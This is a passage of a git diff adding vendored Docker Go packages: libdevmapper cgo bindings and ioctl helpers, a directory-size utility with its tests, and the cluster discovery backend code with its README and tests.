+		dmLogger.DMLog(int(level), C.GoString(file), int(line), int(dmErrnoOrClass), msg)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go
new file mode 100644
index 0000000000..91fbc85b3a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go
@@ -0,0 +1,251 @@
+// +build linux
+
+package devicemapper
+
+/*
+#cgo LDFLAGS: -L. -ldevmapper
+#include <libdevmapper.h>
+#include <linux/fs.h>   // FIXME: present only for BLKGETSIZE64, maybe we can remove it?
+
+// FIXME: Can't we find a way to do the logging in pure Go?
+extern void DevmapperLogCallback(int level, char *file, int line, int dm_errno_or_class, char *str);
+
+static void	log_cb(int level, const char *file, int line, int dm_errno_or_class, const char *f, ...)
+{
+  char buffer[256];
+  va_list ap;
+
+  va_start(ap, f);
+  vsnprintf(buffer, 256, f, ap);
+  va_end(ap);
+
+  DevmapperLogCallback(level, (char *)file, line, dm_errno_or_class, buffer);
+}
+
+static void	log_with_errno_init()
+{
+  dm_log_with_errno_init(log_cb);
+}
+*/
+import "C"
+
+import (
+	"reflect"
+	"unsafe"
+)
+
+type (
+	cdmTask C.struct_dm_task
+)
+
+// IOCTL consts
+const (
+	BlkGetSize64 = C.BLKGETSIZE64
+	BlkDiscard   = C.BLKDISCARD
+)
+
+// Devicemapper cookie flags.
+const (
+	DmUdevDisableSubsystemRulesFlag = C.DM_UDEV_DISABLE_SUBSYSTEM_RULES_FLAG
+	DmUdevDisableDiskRulesFlag      = C.DM_UDEV_DISABLE_DISK_RULES_FLAG
+	DmUdevDisableOtherRulesFlag     = C.DM_UDEV_DISABLE_OTHER_RULES_FLAG
+	DmUdevDisableLibraryFallback    = C.DM_UDEV_DISABLE_LIBRARY_FALLBACK
+)
+
+// DeviceMapper mapped functions.
+var (
+	DmGetLibraryVersion       = dmGetLibraryVersionFct
+	DmGetNextTarget           = dmGetNextTargetFct
+	DmLogInitVerbose          = dmLogInitVerboseFct
+	DmSetDevDir               = dmSetDevDirFct
+	DmTaskAddTarget           = dmTaskAddTargetFct
+	DmTaskCreate              = dmTaskCreateFct
+	DmTaskDestroy             = dmTaskDestroyFct
+	DmTaskGetDeps             = dmTaskGetDepsFct
+	DmTaskGetInfo             = dmTaskGetInfoFct
+	DmTaskGetDriverVersion    = dmTaskGetDriverVersionFct
+	DmTaskRun                 = dmTaskRunFct
+	DmTaskSetAddNode          = dmTaskSetAddNodeFct
+	DmTaskSetCookie           = dmTaskSetCookieFct
+	DmTaskSetMessage          = dmTaskSetMessageFct
+	DmTaskSetName             = dmTaskSetNameFct
+	DmTaskSetRo               = dmTaskSetRoFct
+	DmTaskSetSector           = dmTaskSetSectorFct
+	DmUdevWait                = dmUdevWaitFct
+	DmUdevSetSyncSupport      = dmUdevSetSyncSupportFct
+	DmUdevGetSyncSupport      = dmUdevGetSyncSupportFct
+	DmCookieSupported         = dmCookieSupportedFct
+	LogWithErrnoInit          = logWithErrnoInitFct
+	DmTaskDeferredRemove      = dmTaskDeferredRemoveFct
+	DmTaskGetInfoWithDeferred = dmTaskGetInfoWithDeferredFct
+)
+
+func free(p *C.char) {
+	C.free(unsafe.Pointer(p))
+}
+
+func dmTaskDestroyFct(task *cdmTask) {
+	C.dm_task_destroy((*C.struct_dm_task)(task))
+}
+
+func dmTaskCreateFct(taskType int) *cdmTask {
+	return (*cdmTask)(C.dm_task_create(C.int(taskType)))
+}
+
+func dmTaskRunFct(task *cdmTask) int {
+	ret, _ := C.dm_task_run((*C.struct_dm_task)(task))
+	return int(ret)
+}
+
+func dmTaskSetNameFct(task *cdmTask, name string) int {
+	Cname := C.CString(name)
+	defer free(Cname)
+
+	return int(C.dm_task_set_name((*C.struct_dm_task)(task), Cname))
+}
+
+func dmTaskSetMessageFct(task *cdmTask, message string) int {
+	Cmessage := C.CString(message)
+	defer free(Cmessage)
+
+	return int(C.dm_task_set_message((*C.struct_dm_task)(task), Cmessage))
+}
+
+func dmTaskSetSectorFct(task *cdmTask, sector uint64) int {
+	return int(C.dm_task_set_sector((*C.struct_dm_task)(task), C.uint64_t(sector)))
+}
+
+func dmTaskSetCookieFct(task *cdmTask, cookie *uint, flags uint16) int {
+	cCookie := C.uint32_t(*cookie)
+	defer func() {
+		*cookie = uint(cCookie)
+	}()
+	return int(C.dm_task_set_cookie((*C.struct_dm_task)(task), &cCookie, C.uint16_t(flags)))
+}
+
+func dmTaskSetAddNodeFct(task *cdmTask, addNode AddNodeType) int {
+	return int(C.dm_task_set_add_node((*C.struct_dm_task)(task), C.dm_add_node_t(addNode)))
+}
+
+func dmTaskSetRoFct(task *cdmTask) int {
+	return int(C.dm_task_set_ro((*C.struct_dm_task)(task)))
+}
+
+func dmTaskAddTargetFct(task *cdmTask,
+	start, size uint64, ttype, params string) int {
+
+	Cttype := C.CString(ttype)
+	defer free(Cttype)
+
+	Cparams := C.CString(params)
+	defer free(Cparams)
+
+	return int(C.dm_task_add_target((*C.struct_dm_task)(task), C.uint64_t(start), C.uint64_t(size), Cttype, Cparams))
+}
+
+func dmTaskGetDepsFct(task *cdmTask) *Deps {
+	Cdeps := C.dm_task_get_deps((*C.struct_dm_task)(task))
+	if Cdeps == nil {
+		return nil
+	}
+
+	// golang issue: https://github.com/golang/go/issues/11925
+	hdr := reflect.SliceHeader{
+		Data: uintptr(unsafe.Pointer(uintptr(unsafe.Pointer(Cdeps)) + unsafe.Sizeof(*Cdeps))),
+		Len:  int(Cdeps.count),
+		Cap:  int(Cdeps.count),
+	}
+	devices := *(*[]C.uint64_t)(unsafe.Pointer(&hdr))
+
+	deps := &Deps{
+		Count:  uint32(Cdeps.count),
+		Filler: uint32(Cdeps.filler),
+	}
+	for _, device := range devices {
+		deps.Device = append(deps.Device, uint64(device))
+	}
+	return deps
+}
+
+func dmTaskGetInfoFct(task *cdmTask, info *Info) int {
+	Cinfo := C.struct_dm_info{}
+	defer func() {
+		info.Exists = int(Cinfo.exists)
+		info.Suspended = int(Cinfo.suspended)
+		info.LiveTable = int(Cinfo.live_table)
+		info.InactiveTable = int(Cinfo.inactive_table)
+		info.OpenCount = int32(Cinfo.open_count)
+		info.EventNr = uint32(Cinfo.event_nr)
+		info.Major = uint32(Cinfo.major)
+		info.Minor = uint32(Cinfo.minor)
+		info.ReadOnly = int(Cinfo.read_only)
+		info.TargetCount = int32(Cinfo.target_count)
+	}()
+	return int(C.dm_task_get_info((*C.struct_dm_task)(task), &Cinfo))
+}
+
+func dmTaskGetDriverVersionFct(task *cdmTask) string {
+	buffer := C.malloc(128)
+	defer C.free(buffer)
+	res := C.dm_task_get_driver_version((*C.struct_dm_task)(task), (*C.char)(buffer), 128)
+	if res == 0 {
+		return ""
+	}
+	return C.GoString((*C.char)(buffer))
+}
+
+func dmGetNextTargetFct(task *cdmTask, next unsafe.Pointer, start, length *uint64, target, params *string) unsafe.Pointer {
+	var (
+		Cstart, Clength      C.uint64_t
+		CtargetType, Cparams *C.char
+	)
+	defer func() {
+		*start = uint64(Cstart)
+		*length = uint64(Clength)
+		*target = C.GoString(CtargetType)
+		*params = C.GoString(Cparams)
+	}()
+
+	nextp := C.dm_get_next_target((*C.struct_dm_task)(task), next, &Cstart, &Clength, &CtargetType, &Cparams)
+	return nextp
+}
+
+func dmUdevSetSyncSupportFct(syncWithUdev int) {
+	(C.dm_udev_set_sync_support(C.int(syncWithUdev)))
+}
+
+func dmUdevGetSyncSupportFct() int {
+	return int(C.dm_udev_get_sync_support())
+}
+
+func dmUdevWaitFct(cookie uint) int {
+	return int(C.dm_udev_wait(C.uint32_t(cookie)))
+}
+
+func dmCookieSupportedFct() int {
+	return int(C.dm_cookie_supported())
+}
+
+func dmLogInitVerboseFct(level int) {
+	C.dm_log_init_verbose(C.int(level))
+}
+
+func logWithErrnoInitFct() {
+	C.log_with_errno_init()
+}
+
+func dmSetDevDirFct(dir string) int {
+	Cdir := C.CString(dir)
+	defer free(Cdir)
+
+	return int(C.dm_set_dev_dir(Cdir))
+}
+
+func dmGetLibraryVersionFct(version *string) int {
+	buffer := C.CString(string(make([]byte, 128)))
+	defer free(buffer)
+	defer func() {
+		*version = C.GoString(buffer)
+	}()
+	return int(C.dm_get_library_version(buffer, 128))
+}
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go
new file mode 100644
index 0000000000..dc361eab76
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go
@@ -0,0 +1,34 @@
+// +build linux,!libdm_no_deferred_remove
+
+package devicemapper
+
+/*
+#cgo LDFLAGS: -L. -ldevmapper
+#include <libdevmapper.h>
+*/
+import "C"
+
+// LibraryDeferredRemovalSupport is supported when statically linked.
+const LibraryDeferredRemovalSupport = true
+
+func dmTaskDeferredRemoveFct(task *cdmTask) int {
+	return int(C.dm_task_deferred_remove((*C.struct_dm_task)(task)))
+}
+
+func dmTaskGetInfoWithDeferredFct(task *cdmTask, info *Info) int {
+	Cinfo := C.struct_dm_info{}
+	defer func() {
+		info.Exists = int(Cinfo.exists)
+		info.Suspended = int(Cinfo.suspended)
+		info.LiveTable = int(Cinfo.live_table)
+		info.InactiveTable = int(Cinfo.inactive_table)
+		info.OpenCount = int32(Cinfo.open_count)
+		info.EventNr = uint32(Cinfo.event_nr)
+		info.Major = uint32(Cinfo.major)
+		info.Minor = uint32(Cinfo.minor)
+		info.ReadOnly = int(Cinfo.read_only)
+		info.TargetCount = int32(Cinfo.target_count)
+		info.DeferredRemove = int(Cinfo.deferred_remove)
+	}()
+	return int(C.dm_task_get_info((*C.struct_dm_task)(task), &Cinfo))
+}
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go
new file mode 100644
index 0000000000..8249ccf854
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go
@@ -0,0 +1,15 @@
+// +build linux,libdm_no_deferred_remove
+
+package devicemapper
+
+// LibraryDeferredRemovalSupport is not supported when statically linked.
+const LibraryDeferredRemovalSupport = false
+
+func dmTaskDeferredRemoveFct(task *cdmTask) int {
+	// Error. Nobody should be calling it.
+	return -1
+}
+
+func dmTaskGetInfoWithDeferredFct(task *cdmTask, info *Info) int {
+	return -1
+}
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go b/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go
new file mode 100644
index 0000000000..581b57eb86
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go
@@ -0,0 +1,27 @@
+// +build linux
+
+package devicemapper
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+func ioctlBlkGetSize64(fd uintptr) (int64, error) {
+	var size int64
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, BlkGetSize64, uintptr(unsafe.Pointer(&size))); err != 0 {
+		return 0, err
+	}
+	return size, nil
+}
+
+func ioctlBlkDiscard(fd uintptr, offset, length uint64) error {
+	var r [2]uint64
+	r[0] = offset
+	r[1] = length
+
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, BlkDiscard, uintptr(unsafe.Pointer(&r[0]))); err != 0 {
+		return err
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/log.go b/vendor/github.com/docker/docker/pkg/devicemapper/log.go
new file mode 100644
index 0000000000..cee5e54549
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/log.go
@@ -0,0 +1,11 @@
+package devicemapper
+
+// definitions from lvm2 lib/log/log.h
+const (
+	LogLevelFatal  = 2 + iota // _LOG_FATAL
+	LogLevelErr               // _LOG_ERR
+	LogLevelWarn              // _LOG_WARN
+	LogLevelNotice            // _LOG_NOTICE
+	LogLevelInfo              // _LOG_INFO
+	LogLevelDebug             // _LOG_DEBUG
+)
diff --git a/vendor/github.com/docker/docker/pkg/directory/directory.go b/vendor/github.com/docker/docker/pkg/directory/directory.go
new file mode 100644
index 0000000000..1715ef45d9
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/directory/directory.go
@@ -0,0 +1,26 @@
+package directory
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+)
+
+// MoveToSubdir moves all contents of a directory to a subdirectory underneath the original path
+func MoveToSubdir(oldpath, subdir string) error {
+
+	infos, err := ioutil.ReadDir(oldpath)
+	if err != nil {
+		return err
+	}
+	for _, info := range infos {
+		if info.Name() != subdir {
+			oldName := filepath.Join(oldpath, info.Name())
+			newName := filepath.Join(oldpath, subdir, info.Name())
+			if err := os.Rename(oldName, newName); err != nil {
+				return err
+			}
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_test.go b/vendor/github.com/docker/docker/pkg/directory/directory_test.go
new file mode 100644
index 0000000000..2b7a4657be
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/directory/directory_test.go
@@ -0,0 +1,192 @@
+package directory
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"reflect"
+	"sort"
+	"testing"
+)
+
+// Size of an empty directory should be 0
+func TestSizeEmpty(t *testing.T) {
+	var dir string
+	var err error
+	if dir, err = ioutil.TempDir(os.TempDir(), "testSizeEmptyDirectory"); err != nil {
+		t.Fatalf("failed to create directory: %s", err)
+	}
+
+	var size int64
+	if size, _ = Size(dir); size != 0 {
+		t.Fatalf("empty directory has size: %d", size)
+	}
+}
+
+// Size of a directory with one empty file should be 0
+func TestSizeEmptyFile(t *testing.T) {
+	var dir string
+	var err error
+	if dir, err = ioutil.TempDir(os.TempDir(), "testSizeEmptyFile"); err != nil {
+		t.Fatalf("failed to create directory: %s", err)
+	}
+
+	var file *os.File
+	if file, err = ioutil.TempFile(dir, "file"); err != nil {
+		t.Fatalf("failed to create file: %s", err)
+	}
+
+	var size int64
+	if size, _ = Size(file.Name()); size != 0 {
+		t.Fatalf("directory with one file has size: %d", size)
+	}
+}
+
+// Size of a directory with one 5-byte file should be 5
+func TestSizeNonemptyFile(t *testing.T) {
+	var dir string
+	var err error
+	if dir, err = ioutil.TempDir(os.TempDir(), "testSizeNonemptyFile"); err != nil {
+		t.Fatalf("failed to create directory: %s", err)
+	}
+
+	var file *os.File
+	if file, err = ioutil.TempFile(dir, "file"); err != nil {
+		t.Fatalf("failed to create file: %s", err)
+	}
+
+	d := []byte{97, 98, 99, 100, 101}
+	file.Write(d)
+
+	var size int64
+	if size, _ = Size(file.Name()); size != 5 {
+		t.Fatalf("directory with one 5-byte file has size: %d", size)
+	}
+}
+
+// Size of a directory with one empty directory should be 0
+func TestSizeNestedDirectoryEmpty(t *testing.T) {
+	var dir string
+	var err error
+	if dir, err = ioutil.TempDir(os.TempDir(), "testSizeNestedDirectoryEmpty"); err != nil {
+		t.Fatalf("failed to create directory: %s", err)
+	}
+	if dir, err = ioutil.TempDir(dir, "nested"); err != nil {
+		t.Fatalf("failed to create nested directory: %s", err)
+	}
+
+	var size int64
+	if size, _ = Size(dir); size != 0 {
+		t.Fatalf("directory with one empty directory has size: %d", size)
+	}
+}
+
+// Test directory with 1 file and 1 empty directory
+func TestSizeFileAndNestedDirectoryEmpty(t *testing.T) {
+	var dir string
+	var err error
+	if dir, err = ioutil.TempDir(os.TempDir(), "testSizeFileAndNestedDirectoryEmpty"); err != nil {
+		t.Fatalf("failed to create directory: %s", err)
+	}
+	if dir, err = ioutil.TempDir(dir, "nested"); err != nil {
+		t.Fatalf("failed to create nested directory: %s", err)
+	}
+
+	var file *os.File
+	if file, err = ioutil.TempFile(dir, "file"); err != nil {
+		t.Fatalf("failed to create file: %s", err)
+	}
+
+	d := []byte{100, 111, 99, 107, 101, 114}
+	file.Write(d)
+
+	var size int64
+	if size, _ = Size(dir); size != 6 {
+		t.Fatalf("directory with 6-byte file and empty directory has size: %d", size)
+	}
+}
+
+// Test directory with 1 file and 1 non-empty directory
+func TestSizeFileAndNestedDirectoryNonempty(t *testing.T) {
+	var dir, dirNested string
+	var err error
+	if dir, err = ioutil.TempDir(os.TempDir(), "TestSizeFileAndNestedDirectoryNonempty"); err != nil {
+		t.Fatalf("failed to create directory: %s", err)
+	}
+	if dirNested, err = ioutil.TempDir(dir, "nested"); err != nil {
+		t.Fatalf("failed to create nested directory: %s", err)
+	}
+
+	var file *os.File
+	if file, err = ioutil.TempFile(dir, "file"); err != nil {
+		t.Fatalf("failed to create file: %s", err)
+	}
+
+	data := []byte{100, 111, 99, 107, 101, 114}
+	file.Write(data)
+
+	var nestedFile *os.File
+	if nestedFile, err = ioutil.TempFile(dirNested, "file"); err != nil {
+		t.Fatalf("failed to create file in nested directory: %s", err)
+	}
+
+	nestedData := []byte{100, 111, 99, 107, 101, 114}
+	nestedFile.Write(nestedData)
+
+	var size int64
+	if size, _ = Size(dir); size != 12 {
+		t.Fatalf("directory with 6-byte file and nested directory with 6-byte file has size: %d", size)
+	}
+}
+
+// Test migration of directory to a subdir underneath itself
+func TestMoveToSubdir(t *testing.T) {
+	var outerDir, subDir string
+	var err error
+
+	if outerDir, err = ioutil.TempDir(os.TempDir(), "TestMoveToSubdir"); err != nil {
+		t.Fatalf("failed to create directory: %v", err)
+	}
+
+	if subDir, err = ioutil.TempDir(outerDir, "testSub"); err != nil {
+		t.Fatalf("failed to create subdirectory: %v", err)
+	}
+
+	// write 4 temp files in the outer dir to get moved
+	filesList := []string{"a", "b", "c", "d"}
+	for _, fName := range filesList {
+		if file, err := os.Create(filepath.Join(outerDir, fName)); err != nil {
+			t.Fatalf("couldn't create temp file %q: %v", fName, err)
+		} else {
+			file.WriteString(fName)
+			file.Close()
+		}
+	}
+
+	if err = MoveToSubdir(outerDir, filepath.Base(subDir)); err != nil {
+		t.Fatalf("Error during migration of content to subdirectory: %v", err)
+	}
+	// validate that the files were moved to the subdirectory
+	infos, err := ioutil.ReadDir(subDir)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(infos) != 4 {
+		t.Fatalf("Should be four files in the subdir after the migration: actual length: %d", len(infos))
+	}
+	var results []string
+	for _, info := range infos {
+		results = append(results, info.Name())
+	}
+	sort.Sort(sort.StringSlice(results))
+	if !reflect.DeepEqual(filesList, results) {
+		t.Fatalf("Results after migration do not equal list of files: expected: %v, got: %v", filesList, results)
+	}
+}
+
+// Test a non-existing directory
+func TestSizeNonExistingDirectory(t *testing.T) {
+	if _, err := Size("/thisdirectoryshouldnotexist/TestSizeNonExistingDirectory"); err == nil {
+		t.Fatalf("error is expected")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_unix.go b/vendor/github.com/docker/docker/pkg/directory/directory_unix.go
new file mode 100644
index 0000000000..397251bdb8
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/directory/directory_unix.go
@@ -0,0 +1,48 @@
+// +build linux freebsd solaris
+
+package directory
+
+import (
+	"os"
+	"path/filepath"
+	"syscall"
+)
+
+// Size walks a directory tree and returns its total size in bytes.
+func Size(dir string) (size int64, err error) {
+	data := make(map[uint64]struct{})
+	err = filepath.Walk(dir, func(d string, fileInfo os.FileInfo, err error) error {
+		if err != nil {
+			// if dir does not exist, Size() returns the error.
+			// if dir/x disappeared while walking, Size() ignores dir/x.
+			if os.IsNotExist(err) && d != dir {
+				return nil
+			}
+			return err
+		}
+
+		// Ignore directory sizes
+		if fileInfo == nil {
+			return nil
+		}
+
+		s := fileInfo.Size()
+		if fileInfo.IsDir() || s == 0 {
+			return nil
+		}
+
+		// Check inode to handle hard links correctly
+		inode := fileInfo.Sys().(*syscall.Stat_t).Ino
+		// inode is not a uint64 on all platforms. Cast it to avoid issues.
+		if _, exists := data[uint64(inode)]; exists {
+			return nil
+		}
+		// inode is not a uint64 on all platforms. Cast it to avoid issues.
+		data[uint64(inode)] = struct{}{}
+
+		size += s
+
+		return nil
+	})
+	return
+}
diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_windows.go b/vendor/github.com/docker/docker/pkg/directory/directory_windows.go
new file mode 100644
index 0000000000..6fb0917c4c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/directory/directory_windows.go
@@ -0,0 +1,37 @@
+// +build windows
+
+package directory
+
+import (
+	"os"
+	"path/filepath"
+)
+
+// Size walks a directory tree and returns its total size in bytes.
+func Size(dir string) (size int64, err error) {
+	err = filepath.Walk(dir, func(d string, fileInfo os.FileInfo, err error) error {
+		if err != nil {
+			// if dir does not exist, Size() returns the error.
+			// if dir/x disappeared while walking, Size() ignores dir/x.
+			if os.IsNotExist(err) && d != dir {
+				return nil
+			}
+			return err
+		}
+
+		// Ignore directory sizes
+		if fileInfo == nil {
+			return nil
+		}
+
+		s := fileInfo.Size()
+		if fileInfo.IsDir() || s == 0 {
+			return nil
+		}
+
+		size += s
+
+		return nil
+	})
+	return
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/README.md b/vendor/github.com/docker/docker/pkg/discovery/README.md
new file mode 100644
index 0000000000..39777c2171
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/README.md
@@ -0,0 +1,41 @@
+---
+page_title: Docker discovery
+page_description: discovery
+page_keywords: docker, clustering, discovery
+---
+
+# Discovery
+
+Docker comes with multiple Discovery backends.
+
+## Backends
+
+### Using etcd
+
+Point your Docker Engine instances to a common etcd instance. You can specify
+the address Docker uses to advertise the node using the `--cluster-advertise`
+flag.
+
+```bash
+$ docker daemon -H=<node_ip:2376> --cluster-advertise=<node_ip:2376> --cluster-store etcd://<etcd_ip1>,<etcd_ip2>/<path>
+```
+
+### Using consul
+
+Point your Docker Engine instances to a common Consul instance. You can specify
+the address Docker uses to advertise the node using the `--cluster-advertise`
+flag.
+
+```bash
+$ docker daemon -H=<node_ip:2376> --cluster-advertise=<node_ip:2376> --cluster-store consul://<consul_ip>/<path>
+```
+
+### Using zookeeper
+
+Point your Docker Engine instances to a common Zookeeper instance. You can specify
+the address Docker uses to advertise the node using the `--cluster-advertise`
+flag.
+
+```bash
+$ docker daemon -H=<node_ip:2376> --cluster-advertise=<node_ip:2376> --cluster-store zk://<zk_addr1>,<zk_addr2>/<path>
+```
diff --git a/vendor/github.com/docker/docker/pkg/discovery/backends.go b/vendor/github.com/docker/docker/pkg/discovery/backends.go
new file mode 100644
index 0000000000..2eab550e29
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/backends.go
@@ -0,0 +1,107 @@
+package discovery
+
+import (
+	"fmt"
+	"net"
+	"strings"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+)
+
+var (
+	// Backends is a global map of discovery backends indexed by their
+	// associated scheme.
+	backends = make(map[string]Backend)
+)
+
+// Register makes a discovery backend available by the provided scheme.
+// If Register is called twice with the same scheme an error is returned.
+func Register(scheme string, d Backend) error {
+	if _, exists := backends[scheme]; exists {
+		return fmt.Errorf("scheme already registered %s", scheme)
+	}
+	logrus.WithField("name", scheme).Debugf("Registering discovery service")
+	backends[scheme] = d
+	return nil
+}
+
+func parse(rawurl string) (string, string) {
+	parts := strings.SplitN(rawurl, "://", 2)
+
+	// nodes:port,node2:port => nodes://node1:port,node2:port
+	if len(parts) == 1 {
+		return "nodes", parts[0]
+	}
+	return parts[0], parts[1]
+}
+
+// ParseAdvertise parses the --cluster-advertise daemon config which accepts
+// <ip-address>:<port> or <interface-name>:<port>
+func ParseAdvertise(advertise string) (string, error) {
+	var (
+		iface *net.Interface
+		addrs []net.Addr
+		err   error
+	)
+
+	addr, port, err := net.SplitHostPort(advertise)
+
+	if err != nil {
+		return "", fmt.Errorf("invalid --cluster-advertise configuration: %s: %v", advertise, err)
+	}
+
+	ip := net.ParseIP(addr)
+	// If it is a valid ip-address, use it as is
+	if ip != nil {
+		return advertise, nil
+	}
+
+	// If advertise is a valid interface name, get the valid IPv4 address and use it to advertise
+	ifaceName := addr
+	iface, err = net.InterfaceByName(ifaceName)
+	if err != nil {
+		return "", fmt.Errorf("invalid cluster advertise IP address or interface name (%s) : %v", advertise, err)
+	}
+
+	addrs, err = iface.Addrs()
+	if err != nil {
+		return "", fmt.Errorf("unable to get advertise IP address from interface (%s) : %v", advertise, err)
+	}
+
+	if len(addrs) == 0 {
+		return "", fmt.Errorf("no available advertise IP address in interface (%s)", advertise)
+	}
+
+	addr = ""
+	for _, a := range addrs {
+		ip, _, err := net.ParseCIDR(a.String())
+		if err != nil {
+			return "", fmt.Errorf("error deriving advertise ip-address in interface (%s) : %v", advertise, err)
+		}
+		if ip.To4() == nil || ip.IsLoopback() {
+			continue
+		}
+		addr = ip.String()
+		break
+	}
+	if addr == "" {
+		return "", fmt.Errorf("could not find a valid ip-address in interface %s", advertise)
+	}
+
+	addr = net.JoinHostPort(addr, port)
+	return addr, nil
+}
+
+// New returns a new Discovery given a URL, heartbeat and ttl settings.
+// Returns an error if the URL scheme is not supported.
+func New(rawurl string, heartbeat time.Duration, ttl time.Duration, clusterOpts map[string]string) (Backend, error) {
+	scheme, uri := parse(rawurl)
+	if backend, exists := backends[scheme]; exists {
+		logrus.WithFields(logrus.Fields{"name": scheme, "uri": uri}).Debugf("Initializing discovery service")
+		err := backend.Initialize(uri, heartbeat, ttl, clusterOpts)
+		return backend, err
+	}
+
+	return nil, ErrNotSupported
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/discovery.go b/vendor/github.com/docker/docker/pkg/discovery/discovery.go
new file mode 100644
index 0000000000..ca7f587458
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/discovery.go
@@ -0,0 +1,35 @@
+package discovery
+
+import (
+	"errors"
+	"time"
+)
+
+var (
+	// ErrNotSupported is returned when a discovery service is not supported.
+	ErrNotSupported = errors.New("discovery service not supported")
+
+	// ErrNotImplemented is returned when discovery feature is not implemented
+	// by discovery backend.
+	ErrNotImplemented = errors.New("not implemented in this discovery service")
+)
+
+// Watcher provides watching over a cluster for nodes joining and leaving.
+type Watcher interface {
+	// Watch the discovery for entry changes.
+	// Returns a channel that will receive changes or an error.
+	// Providing a non-nil stopCh can be used to stop watching.
+	Watch(stopCh <-chan struct{}) (<-chan Entries, <-chan error)
+}
+
+// Backend is implemented by discovery backends which manage cluster entries.
+type Backend interface {
+	// Watcher must be provided by every backend.
+	Watcher
+
+	// Initialize the discovery with URIs, a heartbeat, a ttl and optional settings.
+	Initialize(string, time.Duration, time.Duration, map[string]string) error
+
+	// Register to the discovery.
+	Register(string) error
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go b/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go
new file mode 100644
index 0000000000..6084f3ef0d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go
@@ -0,0 +1,137 @@
+package discovery
+
+import (
+	"testing"
+
+	"github.com/go-check/check"
+)
+
+// Hook up gocheck into the "go test" runner.
+func Test(t *testing.T) { check.TestingT(t) }
+
+type DiscoverySuite struct{}
+
+var _ = check.Suite(&DiscoverySuite{})
+
+func (s *DiscoverySuite) TestNewEntry(c *check.C) {
+	entry, err := NewEntry("127.0.0.1:2375")
+	c.Assert(err, check.IsNil)
+	c.Assert(entry.Equals(&Entry{Host: "127.0.0.1", Port: "2375"}), check.Equals, true)
+	c.Assert(entry.String(), check.Equals, "127.0.0.1:2375")
+
+	entry, err = NewEntry("[2001:db8:0:f101::2]:2375")
+	c.Assert(err, check.IsNil)
+	c.Assert(entry.Equals(&Entry{Host: "2001:db8:0:f101::2", Port: "2375"}), check.Equals, true)
+	c.Assert(entry.String(), check.Equals, "[2001:db8:0:f101::2]:2375")
+
+	_, err = NewEntry("127.0.0.1")
+	c.Assert(err, check.NotNil)
+}
+
+func (s *DiscoverySuite) TestParse(c *check.C) {
+	scheme, uri := parse("127.0.0.1:2375")
+	c.Assert(scheme, check.Equals, "nodes")
+	c.Assert(uri, check.Equals, "127.0.0.1:2375")
+
+	scheme, uri = parse("localhost:2375")
+	c.Assert(scheme, check.Equals, "nodes")
+	c.Assert(uri, check.Equals, "localhost:2375")
+
+	scheme, uri = parse("scheme://127.0.0.1:2375")
+	c.Assert(scheme, check.Equals, "scheme")
+	c.Assert(uri, check.Equals, "127.0.0.1:2375")
+
+	scheme, uri = parse("scheme://localhost:2375")
+	c.Assert(scheme, check.Equals, "scheme")
+	c.Assert(uri, check.Equals, "localhost:2375")
+
+	scheme, uri = parse("")
+	c.Assert(scheme, check.Equals, "nodes")
+	c.Assert(uri, check.Equals, "")
+}
+
+func (s *DiscoverySuite) TestCreateEntries(c *check.C) {
+	entries, err := CreateEntries(nil)
+	c.Assert(entries, check.DeepEquals, Entries{})
+	c.Assert(err, check.IsNil)
+
+	entries, err = CreateEntries([]string{"127.0.0.1:2375", "127.0.0.2:2375", "[2001:db8:0:f101::2]:2375", ""})
+	c.Assert(err, check.IsNil)
+	expected := Entries{
+		&Entry{Host: "127.0.0.1", Port: "2375"},
+		&Entry{Host: "127.0.0.2", Port: "2375"},
+		&Entry{Host: "2001:db8:0:f101::2", Port: "2375"},
+	}
+	c.Assert(entries.Equals(expected), check.Equals, true)
+
+	_, err = CreateEntries([]string{"127.0.0.1", "127.0.0.2"})
+	c.Assert(err, check.NotNil)
+}
+
+func (s *DiscoverySuite) TestContainsEntry(c *check.C) {
+	entries, err := CreateEntries([]string{"127.0.0.1:2375", "127.0.0.2:2375", ""})
+	c.Assert(err, check.IsNil)
+	c.Assert(entries.Contains(&Entry{Host: "127.0.0.1", Port: "2375"}), check.Equals, true)
